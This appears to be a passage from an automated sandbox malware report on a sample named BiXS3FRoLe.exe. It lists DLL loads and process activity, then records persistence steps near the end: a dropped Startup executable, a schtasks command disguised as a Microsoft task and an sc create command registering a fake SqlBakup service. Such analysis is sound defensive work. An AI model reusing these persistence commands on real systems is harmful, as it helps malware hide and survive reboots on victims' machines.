      Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsusererclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\System32\find.exe | Section loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netapi32.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: samcli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: dsrole.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BiXS3FRoLe.exeStatic file information: File size 1257984 > 1048576
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: BiXS3FRoLe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B100BB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01557 push ecx; ret 0_2_00B0156A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01BB6 push ecx; ret 0_2_00B01BC9
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1557 push ecx; ret 48_2_000A156A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1BB6 push ecx; ret 48_2_000A1BC9

      Persistence and Installation Behavior

Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Windows\SysMain.sys
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\N-Save.sys
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

      Boot Survival

Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

      Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 3586
